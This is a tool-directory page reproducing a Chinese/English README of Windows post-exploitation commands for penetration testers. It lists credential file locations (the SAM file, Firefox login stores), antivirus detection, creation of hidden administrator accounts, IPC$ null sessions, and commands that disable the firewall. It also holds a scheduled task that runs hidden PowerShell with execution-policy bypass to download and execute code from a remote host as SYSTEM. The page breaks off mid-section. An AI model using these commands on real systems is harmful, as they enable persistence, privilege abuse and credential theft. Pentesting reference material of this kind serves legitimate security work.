Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Pentest-Command — Pentest-Command | Kitploit
Tools/GitHubGitHub/al1ex/pentest-command
Privilege EscalationPersistence MechanismsLateral MovementInformation GatheringPost-ExploitationPenetration TestingUtilities & FrameworksLearning & EducationCurated Resources
GitHubal1ex/pentest-command

Pentest-Command

Pentest-Command

208164 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository

项目背景

在渗透测试过程中我们会使用到各类的框架,例如:MSF、CS、Empire、Impacket等,本项目的主要目的是收录在后渗透测试阶段中常用到的命令

基础知识

Windows目录介绍

a、开机启动程序目录```c C:\Users\Al1ex\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

b、开机自启动程序(该特色常被用于进行权限维持)```c
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

c. System installation path```c C:\Windows

d. System resource files include dll, exe, and other files```c
C:\Windows\System32  

e. System password storage file```c# C:\Windows\System32\config\SAM

f、System log files```c
C:\PerfLogs   

g、Domain log location```c #服务器登录日志 C:\Windows\System32\winevt\Logs\Security.evtx

#远程登录日志 c:\windows\system32\winevt\logs*.remote*

h. Host remote login logs```c
HKCU\Software\Microsoft\Terminal Server Client\Servers
HKCU\Software\Microsoft\Terminal Server Client\Default

i. Firefox browser passwords and history```c C:\Users\用户名\AppData\Roaming\Mozilla\Firefox\Profiles\xxx.default-release\logins.json C:\Users\用户名\AppData\Roaming\Mozilla\Firefox\Profiles\xxx.default-release\key3.db C:\Users\用户名\AppData\Roaming\Mozilla\Firefox\Profiles\xxx.default-release\place.sqlite

#说明:将上述三个文件导入到对应版本firefox的文件夹中,即可读取密码和历史记录

j. Recently Used Files```c
#该目录下的最近使用文件是快捷方式
C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Recent\

WIN Window Commands```c dxdiag 查询电脑硬件配置信息 control 控制面板 services.msc 服务 msconfig 系统配置 regedit 注册表 ncpa.cpl 网络连接 firewall.cpl 防火墙 devmgmt.msc 设备管理器 diskmgmt.msc 磁盘管理实用 compmgmt.msc 计算机管理 winver 检查Windows版本
write 写字板 mspaint 画图板 mstsc 远程桌面连接 magnify 放大镜实用程序 notepad 打开记事本 shrpubw 创建共享文件夹 calc 启动计算器 osk 打开屏幕键盘

### Command Collection

#### System Information```c
CHCP 65001                           				  修改字体编码为UTF-8
systeminfo                           				  查看系统信息
hostname                             				  查看主机名
set                                  				  查看环境变量
set path                             				  查看指定环境变量
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"	    查看系统版本	
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"  查看系统版本
echo %PROCESSOR_ARCHITECTURE% 						  查看系统体系结构
net statistics workstation 							  查看主机开机时间   
wmic qfe get Caption,Description,HotFixID,InstalledOn 查看补丁信息  
    

Network Information```c

ping -t -l 65500 ip 死亡之ping ipconfig /release 释放ip ipconfig /renew 重新获得ip ipconfig /flushdns 刷新DNS缓存 route print 打印路由信息 arp -a 查看arp缓存 net view 查看局域网内其他计算机名称 netsh firewall show state 防火墙状态 netsh firewall show config 防火墙规则

#### User Information```c
whoami                                查看系统当前用户
net user                              查看有哪些用户
net user al1ex                          查看用户al1ex的信息
net localgroup                        查看组
net localgroup administrators         查看组administrators的信息
net user  hack   123  /add            新建一个用户hack,密码为123
net user  hack$  123  /add            新建一个隐藏hack用户,密码为123
net user  hack   /del                 删除用户hack
net localgroup  administrators  hack  /add   将普通用户hack提权到管理员
net user  guest  /active:yes          激活guest用户
net user  guest  /active:no           关闭guest用户
net password   密码                    更改系统当前登录用户密码
net user guest 密码                    更改guest用户密码
net session 						  查看本地计算机和连接的客户端的会话
query user || qwinsta   			  查看当前在线用户信息

Process Services```c

tasklist 查看进程 tasklist /v 查看进程,显示进程使用者名称 wmic process list brief 查看进程列表信息 netstat -ano 查看系统开放端口 netstat -ano|findstr 80 查看80端口对应的PID tasklist | findstr 80 查看80端口对应的进程 taskkill /f /t /im xx.exe 杀死xx.exe进程 taskkill /F -pid 520 杀死pid为520的进程 net start 查看开启了哪些服务 net start telnet 开启telnet服务 net stop telnet 停止 telnet服务 start www.baidu.com 打开网址 wmic service list brief 本机服务信息 wmic startup get command,caption 启动程序信息

View antivirus software:```
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe

Antivirus process``` 360SD.exe 360杀毒 360TRAY.exe 360实时保护 ZHUDONGFANGYU.exe 360主动防御 KSAFETRAY.exe 金山卫士 SAFEDOGUPDATECENTER.exe 服务器安全狗 MCAFEE MCSHIELD.exe MCAFEE EGULEXE NoD32 AVP.exe 卡巴斯基 AVGUARD.exe 小红伞 BDAGENT.exe BITDEFENDER

#### Software Information```
wmic product get name,version 
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"  

Routing Information```c

route print arp -A

#### Shared Information```c
net use                               查看连接
net share                             查看本地开启的共享
wmic share get name,path,status		  查看本地开启的共享
net share ipc$                        开启ipc$共享
net share ipc$ /del                   删除ipc$共享
net share c$ /del                     删除C盘共享
 
net use \\192.168.10.15\ipc$ /u:"" ""     与192.168.10.15建立ipc空连接
net use \\192.168.10.15      /u:"" ""     与192.168.10.15建立ipc空连接,可以将ipc$去掉
net use \\192.168.10.15 /u:"administrator" "root"   以administrator身份与192.168.10.15建立ipc$连接
net use \\192.168.10.15 /del           删除ipc连接
 
net use \\192.168.10.15\c$  /u:"administrator" "root"    建立C盘共享
dir \\192.168.10.15\c$                 查看192.168.10.15 C盘文件
dir \\192.168.10.15\c$\user            查看192.168.10.15 C盘文件下的user目录
dir \\192.168.10.15\c$\user\test.exe   查看192.168.10.15 C盘文件下的user目录下的test.exe文件
net use \\192.168.10.15\c$  /del       删除该C盘共享连接
 
net use k: \\192.168.10.15\c$  /u:"administrator" "root"    将目标C盘映射到本地K盘
net use k: /del                        删除该映射

File Operations```

echo hello,word > 1.txt 向1.txt中写入 hello,word echo hello,word >>1.txt 向1.txt中追加 hello,word del 删除一个文件 deltree 删除文件夹和它下面的所有子文件夹还有文件 ren 1.txt 2.txt 将 1.txt 重命名为 2.txt type 1.txt 查看1.txt文件的内容 md 创建一个文件夹 rd 删除一个文件夹 move 1.txt d:/ 将1.txt文件移动到d盘下 type 123.txt 打开123.txt文件 dir c:\ 查看C盘下的文件 dir c:\ /A 查看C盘下的所有文件,包括隐藏文件 dir c:\ /S 查看C盘下和其子文件夹下的文件 dir c:\ /B 只显示C盘下的文件名

#### Scheduled Tasks

a. Create a scheduled task```c
#本地应用
schtasks /create /tn test /sc HOURLY /mo 1 /tr c:\vps.exe /ru system /f

#远程应用
schtasks /create /tn test /sc onstart/onlogon/HOURLY /mo 1 /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://xx.xx.xx.xx'''))'" /ru system /f

b. Query scheduled tasks```c schtasks /query /fo LIST /v schtasks /query | findstr test

c、Start scheduled task```c
schtasks /run /i /tn "test"

d. Delete scheduled task```c schtasks /delete /tn "test" /f

#### 防火墙类

a、查看防火墙配置```c
netsh firewall show config

b、Set firewall log storage location```c netsh advfirewall set currentprofile logging filename "C:\Windows\temp\FirewallLOG.log"

c. Disable the firewall```c
netsh firewall get opmode disable  				(WIN2003之前)
netsh advfirewall set allprofiles state off 	(WIN2003之后)

d. Allow full connections for a program

Download Tool